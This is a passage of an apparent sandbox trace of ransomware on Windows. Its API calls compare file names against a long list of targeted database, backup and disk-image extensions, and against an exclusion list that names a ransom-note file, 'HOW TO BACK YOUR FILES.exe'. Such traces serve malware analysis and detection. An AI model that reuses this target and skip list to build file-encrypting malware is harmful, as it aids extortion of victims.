-1 [0039.886] lstrlenW (lpString="vdi") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0039.886] lstrlenW (lpString="vhd") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0039.886] lstrlenW (lpString="vhdx") returned 4 [0039.886] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0039.886] lstrlenW (lpString="avhd") returned 4 [0039.886] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0039.886] lstrlenW (lpString="db") returned 2 [0039.886] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0039.886] lstrlenW (lpString="db2") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0039.886] lstrlenW (lpString="db3") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0039.886] lstrlenW (lpString="dbf") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0039.886] lstrlenW (lpString="mdf") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0039.886] lstrlenW (lpString="mdb") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0039.886] lstrlenW (lpString="sql") returned 3 [0039.886] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0039.886] lstrlenW (lpString="sqlite") returned 6 [0039.886] lstrcmpiW (lpString1="rt.jpg", lpString2="sqlite") returned -1 [0039.886] lstrlenW (lpString="sqlite3") returned 7 [0039.886] lstrcmpiW (lpString1="ert.jpg", lpString2="sqlite3") returned -1 [0039.886] lstrlenW (lpString="sqlitedb") returned 8 [0039.887] lstrcmpiW (lpString1="sert.jpg", lpString2="sqlitedb") returned -1 [0039.887] lstrlenW (lpString="xml") returned 3 [0039.887] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0039.887] lstrlenW (lpString="$er") returned 3 [0039.887] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0039.887] lstrlenW (lpString="4dd") returned 3 [0039.887] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0039.887] lstrlenW (lpString="4dl") returned 3 [0039.887] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0039.887] lstrlenW (lpString="^^^") returned 3 [0039.887] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0039.887] lstrlenW (lpString="abs") returned 3 [0039.887] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0039.887] lstrlenW (lpString="abx") returned 3 [0039.887] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0039.887] lstrlenW (lpString="accdb") returned 5 [0039.887] lstrcmpiW (lpString1="t.jpg", lpString2="accdb") returned 1 [0039.887] lstrlenW (lpString="accdc") returned 5 [0039.887] lstrcmpiW (lpString1="t.jpg", lpString2="accdc") returned 1 [0039.887] lstrlenW (lpString="accde") returned 5 [0039.887] lstrcmpiW (lpString1="t.jpg", lpString2="accde") returned 1 [0039.887] lstrlenW (lpString="accdr") returned 5 [0039.887] lstrcmpiW (lpString1="t.jpg", lpString2="accdr") returned 1 [0039.887] lstrlenW (lpString="accdt") returned 5 [0039.887] lstrcmpiW (lpString1="t.jpg", lpString2="accdt") returned 1 [0039.887] lstrlenW (lpString="accdw") returned 5 [0039.887] lstrcmpiW (lpString1="t.jpg", lpString2="accdw") returned 1 [0039.887] lstrlenW (lpString="accft") returned 5 [0039.887] lstrcmpiW (lpString1="t.jpg", lpString2="accft") returned 1 [0039.887] lstrlenW (lpString="adb") returned 3 [0039.887] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0039.887] lstrlenW (lpString="adb") returned 3 [0039.887] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0039.887] lstrlenW (lpString="ade") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0039.888] lstrlenW (lpString="adf") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0039.888] lstrlenW (lpString="adn") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0039.888] lstrlenW (lpString="adp") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0039.888] lstrlenW (lpString="alf") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0039.888] lstrlenW (lpString="ask") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0039.888] lstrlenW (lpString="btr") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0039.888] lstrlenW (lpString="cat") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0039.888] lstrlenW (lpString="cdb") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0039.888] lstrlenW (lpString="ckp") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0039.888] lstrlenW (lpString="cma") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0039.888] lstrlenW (lpString="cpd") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0039.888] lstrlenW (lpString="dacpac") returned 6 [0039.888] lstrcmpiW (lpString1="rt.jpg", lpString2="dacpac") returned 1 [0039.888] lstrlenW (lpString="dad") returned 3 [0039.888] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0039.888] lstrlenW (lpString="dadiagrams") returned 10 [0039.888] lstrlenW (lpString="daschema") returned 8 [0039.888] lstrcmpiW (lpString1="sert.jpg", lpString2="daschema") returned 1 [0039.888] lstrlenW (lpString="db-journal") returned 10 [0039.888] lstrlenW (lpString="db-shm") returned 6 [0039.888] lstrcmpiW (lpString1="rt.jpg", lpString2="db-shm") returned 1 [0039.888] lstrlenW (lpString="db-wal") returned 6 [0039.888] lstrcmpiW (lpString1="rt.jpg", lpString2="db-wal") returned 1 [0039.889] lstrlenW (lpString="dbc") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0039.889] lstrlenW (lpString="dbs") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0039.889] lstrlenW (lpString="dbt") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0039.889] lstrlenW (lpString="dbv") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0039.889] lstrlenW (lpString="dbx") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0039.889] lstrlenW (lpString="dcb") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0039.889] lstrlenW (lpString="dct") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0039.889] lstrlenW (lpString="dcx") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0039.889] lstrlenW (lpString="ddl") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0039.889] lstrlenW (lpString="dlis") returned 4 [0039.889] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0039.889] lstrlenW (lpString="dp1") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0039.889] lstrlenW (lpString="dqy") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0039.889] lstrlenW (lpString="dsk") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0039.889] lstrlenW (lpString="dsn") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0039.889] lstrlenW (lpString="dtsx") returned 4 [0039.889] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0039.889] lstrlenW (lpString="dxl") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0039.889] lstrlenW (lpString="eco") returned 3 [0039.889] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0039.890] lstrlenW (lpString="ecx") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0039.890] lstrlenW (lpString="edb") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0039.890] lstrlenW (lpString="epim") returned 4 [0039.890] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0039.890] lstrlenW (lpString="fcd") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0039.890] lstrlenW (lpString="fdb") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0039.890] lstrlenW (lpString="fic") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0039.890] lstrlenW (lpString="flexolibrary") returned 12 [0039.890] lstrlenW (lpString="fm5") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0039.890] lstrlenW (lpString="fmp") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0039.890] lstrlenW (lpString="fmp12") returned 5 [0039.890] lstrcmpiW (lpString1="t.jpg", lpString2="fmp12") returned 1 [0039.890] lstrlenW (lpString="fmpsl") returned 5 [0039.890] lstrcmpiW (lpString1="t.jpg", lpString2="fmpsl") returned 1 [0039.890] lstrlenW (lpString="fol") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0039.890] lstrlenW (lpString="fp3") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0039.890] lstrlenW (lpString="fp4") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0039.890] lstrlenW (lpString="fp5") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0039.890] lstrlenW (lpString="fp7") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0039.890] lstrlenW (lpString="fpt") returned 3 [0039.890] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0039.891] lstrlenW (lpString="frm") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0039.891] lstrlenW (lpString="gdb") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0039.891] lstrlenW (lpString="gdb") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0039.891] lstrlenW (lpString="grdb") returned 4 [0039.891] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0039.891] lstrlenW (lpString="gwi") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0039.891] lstrlenW (lpString="hdb") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0039.891] lstrlenW (lpString="his") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0039.891] lstrlenW (lpString="ib") returned 2 [0039.891] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0039.891] lstrlenW (lpString="idb") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0039.891] lstrlenW (lpString="ihx") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0039.891] lstrlenW (lpString="itdb") returned 4 [0039.891] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0039.891] lstrlenW (lpString="itw") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0039.891] lstrlenW (lpString="jet") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0039.891] lstrlenW (lpString="jtx") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0039.891] lstrlenW (lpString="kdb") returned 3 [0039.891] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0039.891] lstrlenW (lpString="kexi") returned 4 [0039.891] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0039.891] lstrlenW (lpString="kexic") returned 5 [0039.891] lstrcmpiW (lpString1="t.jpg", lpString2="kexic") returned 1 [0039.891] lstrlenW (lpString="kexis") returned 5 [0039.892] lstrcmpiW (lpString1="t.jpg", lpString2="kexis") returned 1 [0039.892] lstrlenW (lpString="lgc") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0039.892] lstrlenW (lpString="lwx") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0039.892] lstrlenW (lpString="maf") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0039.892] lstrlenW (lpString="maq") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0039.892] lstrlenW (lpString="mar") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0039.892] lstrlenW (lpString="marshal") returned 7 [0039.892] lstrcmpiW (lpString1="ert.jpg", lpString2="marshal") returned -1 [0039.892] lstrlenW (lpString="mas") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0039.892] lstrlenW (lpString="mav") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0039.892] lstrlenW (lpString="maw") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0039.892] lstrlenW (lpString="mdbhtml") returned 7 [0039.892] lstrcmpiW (lpString1="ert.jpg", lpString2="mdbhtml") returned -1 [0039.892] lstrlenW (lpString="mdn") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0039.892] lstrlenW (lpString="mdt") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0039.892] lstrlenW (lpString="mfd") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0039.892] lstrlenW (lpString="mpd") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0039.892] lstrlenW (lpString="mrg") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0039.892] lstrlenW (lpString="mud") returned 3 [0039.892] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0039.892] lstrlenW (lpString="mwb") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0039.893] lstrlenW (lpString="myd") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0039.893] lstrlenW (lpString="ndf") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0039.893] lstrlenW (lpString="nnt") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0039.893] lstrlenW (lpString="nrmlib") returned 6 [0039.893] lstrcmpiW (lpString1="rt.jpg", lpString2="nrmlib") returned 1 [0039.893] lstrlenW (lpString="ns2") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0039.893] lstrlenW (lpString="ns3") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0039.893] lstrlenW (lpString="ns4") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0039.893] lstrlenW (lpString="nsf") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0039.893] lstrlenW (lpString="nv") returned 2 [0039.893] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0039.893] lstrlenW (lpString="nv2") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0039.893] lstrlenW (lpString="nwdb") returned 4 [0039.893] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0039.893] lstrlenW (lpString="nyf") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0039.893] lstrlenW (lpString="odb") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0039.893] lstrlenW (lpString="odb") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0039.893] lstrlenW (lpString="oqy") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0039.893] lstrlenW (lpString="ora") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0039.893] lstrlenW (lpString="orx") returned 3 [0039.893] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0039.894] lstrlenW (lpString="owc") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0039.894] lstrlenW (lpString="p96") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0039.894] lstrlenW (lpString="p97") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0039.894] lstrlenW (lpString="pan") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0039.894] lstrlenW (lpString="pdb") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0039.894] lstrlenW (lpString="pdm") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0039.894] lstrlenW (lpString="pnz") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0039.894] lstrlenW (lpString="qry") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0039.894] lstrlenW (lpString="qvd") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0039.894] lstrlenW (lpString="rbf") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0039.894] lstrlenW (lpString="rctd") returned 4 [0039.894] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0039.894] lstrlenW (lpString="rod") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0039.894] lstrlenW (lpString="rodx") returned 4 [0039.894] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0039.894] lstrlenW (lpString="rpd") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0039.894] lstrlenW (lpString="rsd") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0039.894] lstrlenW (lpString="sas7bdat") returned 8 [0039.894] lstrcmpiW (lpString1="sert.jpg", lpString2="sas7bdat") returned 1 [0039.894] lstrlenW (lpString="sbf") returned 3 [0039.894] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0039.895] lstrlenW (lpString="scx") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0039.895] lstrlenW (lpString="sdb") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0039.895] lstrlenW (lpString="sdc") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0039.895] lstrlenW (lpString="sdf") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0039.895] lstrlenW (lpString="sis") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0039.895] lstrlenW (lpString="spq") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0039.895] lstrlenW (lpString="te") returned 2 [0039.895] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0039.895] lstrlenW (lpString="teacher") returned 7 [0039.895] lstrcmpiW (lpString1="ert.jpg", lpString2="teacher") returned -1 [0039.895] lstrlenW (lpString="tmd") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0039.895] lstrlenW (lpString="tps") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0039.895] lstrlenW (lpString="trc") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0039.895] lstrlenW (lpString="trc") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0039.895] lstrlenW (lpString="trm") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0039.895] lstrlenW (lpString="udb") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0039.895] lstrlenW (lpString="udl") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0039.895] lstrlenW (lpString="usr") returned 3 [0039.895] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0039.895] lstrlenW (lpString="v12") returned 3 [0039.896] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0039.896] lstrlenW (lpString="vis") returned 3 [0039.896] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0039.896] lstrlenW (lpString="vpd") returned 3 [0039.896] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0039.896] lstrlenW (lpString="vvv") returned 3 [0039.896] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0039.896] lstrlenW (lpString="wdb") returned 3 [0039.896] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0039.896] lstrlenW (lpString="wmdb") returned 4 [0039.896] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0039.896] lstrlenW (lpString="wrk") returned 3 [0039.896] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0039.896] lstrlenW (lpString="xdb") returned 3 [0039.896] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0039.896] lstrlenW (lpString="xld") returned 3 [0039.896] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0039.896] lstrlenW (lpString="xmlff") returned 5 [0039.896] lstrcmpiW (lpString1="t.jpg", lpString2="xmlff") returned -1 [0039.896] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.896] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.896] lstrlenW (lpString="desktop.ini") returned 11 [0039.897] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 51 [0039.897] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.897] lstrlenW (lpString="desktop.ini") returned 11 [0039.897] lstrlenW (lpString="Ares865") returned 7 [0039.897] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.897] lstrlenW (lpString=".dll") returned 4 [0039.897] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.897] lstrlenW (lpString=".lnk") returned 4 [0039.897] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.897] lstrlenW (lpString=".ini") returned 4 [0039.897] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.897] lstrlenW (lpString=".sys") returned 4 [0039.897] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.897] lstrlenW (lpString="desktop.ini") returned 11 [0039.897] lstrlenW (lpString="bak") returned 3 [0039.897] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.897] lstrlenW (lpString="ba_") returned 3 [0039.897] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.897] lstrlenW (lpString="dbb") returned 3 [0039.897] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.897] lstrlenW (lpString="vmdk") returned 4 [0039.897] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.897] lstrlenW (lpString="rar") returned 3 [0039.897] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.897] lstrlenW (lpString="zip") returned 3 [0039.897] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.897] lstrlenW (lpString="tgz") returned 3 [0039.897] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.897] lstrlenW (lpString="vbox") returned 4 [0039.897] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.897] lstrlenW (lpString="vdi") returned 3 [0039.897] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.897] lstrlenW (lpString="vhd") returned 3 [0039.897] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.897] lstrlenW (lpString="vhdx") returned 4 [0039.898] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.898] lstrlenW (lpString="avhd") returned 4 [0039.898] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.898] lstrlenW (lpString="db") returned 2 [0039.898] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.898] lstrlenW (lpString="db2") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.898] lstrlenW (lpString="db3") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.898] lstrlenW (lpString="dbf") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.898] lstrlenW (lpString="mdf") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.898] lstrlenW (lpString="mdb") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.898] lstrlenW (lpString="sql") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.898] lstrlenW (lpString="sqlite") returned 6 [0039.898] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.898] lstrlenW (lpString="sqlite3") returned 7 [0039.898] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.898] lstrlenW (lpString="sqlitedb") returned 8 [0039.898] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.898] lstrlenW (lpString="xml") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.898] lstrlenW (lpString="$er") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.898] lstrlenW (lpString="4dd") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.898] lstrlenW (lpString="4dl") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.898] lstrlenW (lpString="^^^") returned 3 [0039.898] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.898] lstrlenW (lpString="abs") returned 3 [0039.899] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.899] lstrlenW (lpString="abx") returned 3 [0039.899] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.899] lstrlenW (lpString="accdb") returned 5 [0039.899] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.899] lstrlenW (lpString="accdc") returned 5 [0039.900] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.900] lstrlenW (lpString="accde") returned 5 [0039.900] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.900] lstrlenW (lpString="accdr") returned 5 [0039.900] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.900] lstrlenW (lpString="accdt") returned 5 [0039.900] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.900] lstrlenW (lpString="accdw") returned 5 [0039.900] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.900] lstrlenW (lpString="accft") returned 5 [0039.900] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.900] lstrlenW (lpString="adb") returned 